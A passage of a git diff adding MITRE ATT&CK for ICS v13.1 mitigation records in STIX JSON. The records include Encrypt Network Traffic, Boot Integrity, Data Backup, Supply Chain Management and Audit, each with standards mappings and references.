b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--f24f6754-c9f1-42fd-9be1-624865b5cf8d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.230Z", + "name": "Encrypt Network Traffic", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-8" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0808", + "external_id": "M0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02.json new file mode 100644 index 0000000000000000000000000000000000000000..36721a5a815d8276f6c536fc8d6533f3588141bf --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--4371515d-8be0-4d95-8aef-072372b58713", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.383Z", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.11", + "IEC 62443-4-2:2019 - CR 1.11", + "NIST SP 800-53 Rev. 4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "created": "2019-06-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0936", + "external_id": "M0936" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7.json new file mode 100644 index 0000000000000000000000000000000000000000..10bd6dee5f14e41de8b41f34668d2ad105f486fe --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--8847406c-8ec3-4aa1-bf83-5fc90c364d58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:16.730Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AT-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0913", + "external_id": "M0913" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405.json new file mode 100644 index 0000000000000000000000000000000000000000..c0979deaa0d90f726f4a657613b76ce3dc5a2b05 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405.json 
@@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--e3ee4de6-70d8-4eeb-80b9-cfebf9b15cb7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:20.632Z", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.14", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "created": "2019-06-11T17:02:36.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0946", + "external_id": "M0946" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401.json new file mode 100644 index 0000000000000000000000000000000000000000..b664f07cae1e8a69dfe961fa7f1532884301e618 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401.json 
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--9e0519f0-c0c5-462a-b73f-917455691305",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-24T15:09:07.609Z",
+ "name": "Mechanical Protection Layers",
+ "description": "Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) ",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401",
+ "created": "2020-09-11T16:32:21.854Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0805",
+ "external_id": "M0805"
+ },
+ {
+ "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004",
+ "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ",
+ "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e.json
new file mode 100644
index 0000000000000000000000000000000000000000..ef95cb7b9a43fd4a735303e57d46a5e7442b02f4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--664848cc-22b1-4e92-828c-b034c76fc8e0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.512Z", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk. Software updates may need to be scheduled around operational down times.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.10", + "NIST SP 800-53 Rev. 4 - SI-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "created": "2019-06-11T17:12:55.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0951", + "external_id": "M0951" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53.json new file mode 100644 index 0000000000000000000000000000000000000000..3804e84675b62ababe321d4ebb7f1c552f8b5b7f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--124421fc-5995-4b53-bd6e-8c923d60fdbf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:16.383Z", + "name": "Watchdog Timers", + "description": "Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.", + "labels": [ + "IEC 62443-4-2:2019 - CR 7.2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0815", + "external_id": "M0815" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa.json new file mode 100644 index 0000000000000000000000000000000000000000..92df540a8beab27891a8268e737f30753a5b9e8f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa.json 
@@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--f77182c6-4292-43a3-9f51-4ca845af459f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.415Z", + "name": "Operational Information Confidentiality", + "description": "Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0809", + "external_id": "M0809" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce.json new file mode 100644 index 0000000000000000000000000000000000000000..783baed8bd8dae0f92b8dae54abe7c9ce2032ef9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--36b87193-0107-4b2f-bed8-a7f1fbada820", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.276Z", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0928", + "external_id": "M0928" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0.json new file mode 100644 index 0000000000000000000000000000000000000000..4094dc3643c94ba77fe9fa8e6fe3d3508475f684 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--b630160b-4bc4-4b30-9042-1f08f2ab78b1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.007Z", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - EDR 3.2", + "NIST SP 800-53 Rev. 4 - MP-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0", + "created": "2019-06-11T16:28:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0934", + "external_id": "M0934" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc.json new file mode 100644 index 0000000000000000000000000000000000000000..447ed33cb48b3bfc78cca782b0e6b74a641e9471 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--da12d452-4be1-4122-a01b-90d18f8c432a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.946Z", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive data-at-rest with strong encryption.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-28" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "created": "2019-06-11T16:43:44.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0941", + "external_id": "M0941" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a.json new file mode 100644 index 0000000000000000000000000000000000000000..74f03cc0eaf6b06176c18e12fa3d829233289881 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a.json 
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--8259b2ea-d3e3-49b9-aeeb-48c0d29363ee",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:14.969Z",
+ "name": "Network Allowlists",
+ "description": "Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.",
+ "labels": [
+ "NIST SP 800-53 Rev. 4 - AC-3"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a",
+ "created": "2019-06-10T20:53:36.319Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0807",
+ "external_id": "M0807"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c.json
new file mode 100644
index 0000000000000000000000000000000000000000..c1de63f2053ececbb597b690e01f72646e3e26e7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c.json
@@ -0,0 +1,35 @@
+{
+ "type": "bundle",
+ "id": "bundle--b14b6620-dfc6-483a-958b-16193b4bbf75",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:16.556Z",
+ "name": "Supply Chain Management",
+ "description": "Implement a supply chain management program, including policies and procedures to ensure all devices and components originate from a trusted supplier and are tested to verify their integrity.",
+ "labels": [
+ "NIST SP 800-53 Rev. 4 - SA-12"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c",
+ "created": "2021-04-12T17:00:21.233Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0817",
+ "external_id": "M0817"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ad12819e-3211-4291-b360-069f280cff0a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ad12819e-3211-4291-b360-069f280cff0a.json
new file mode 100644
index 0000000000000000000000000000000000000000..693a34708ad0d0e5d0390cafdf99819575e29f73
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ad12819e-3211-4291-b360-069f280cff0a.json
@@ -0,0 +1,42 @@
+{
+ "type": "bundle",
+ "id": "bundle--66caee74-ec63-4f09-b5a1-f41865a4da87",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:21.679Z",
+ "name": "Data Backup",
+ "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of 'gold-copy' back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 7.3",
+ "IEC 62443-4-2:2019 - CR 7.3",
+ "NIST SP 800-53 Rev. 4 - CP-9"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a",
+ "created": "2019-07-19T14:33:33.543Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0953",
+ "external_id": "M0953"
+ },
+ {
+ "source_name": "Department of Homeland Security October 2009",
+ "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ",
+ "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e.json
new file mode 100644
index 0000000000000000000000000000000000000000..494a3d03e24fd873fb395c5ca55b0b0e0f93efda
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e.json
@@ -0,0 +1,45 @@
+{
+ "type": "bundle",
+ "id": "bundle--548eef48-3610-4b06-ac17-63c5683f530b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:15.598Z",
+ "name": "Out-of-Band Communications Channel",
+ "description": "Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)",
+ "labels": [
+ "NIST SP 800-53 Rev. 4 - SC-37"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e",
+ "created": "2019-06-06T21:16:18.709Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0810",
+ "external_id": "M0810"
+ },
+ {
+ "source_name": "National Institute of Standards and Technology April 2013",
+ "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ",
+ "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf"
+ },
+ {
+ "source_name": "Defense Advanced Research Projects Agency",
+ "description": "Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17 ",
+ "url": "https://www.darpa.mil/program/rapid-attack-detection-isolation-and-characterization-systems"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697.json
new file mode 100644
index 0000000000000000000000000000000000000000..15ee6a38488037aab0b2ca478729619a938887ed
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--1aa81b4e-05c4-4393-a6e1-be42a692b130",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:20.836Z",
+ "name": "Audit",
+ "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 3.4",
+ "IEC 62443-4-2:2019 - CR 3.4",
+ "NIST SP 800-53 Rev. 4 - SI-7"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697",
+ "created": "2019-06-11T17:06:14.029Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0947",
+ "external_id": "M0947"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac.json
new file mode 100644
index 0000000000000000000000000000000000000000..418968e017905554b708de1ff6667de287c9832b
--- /dev/null
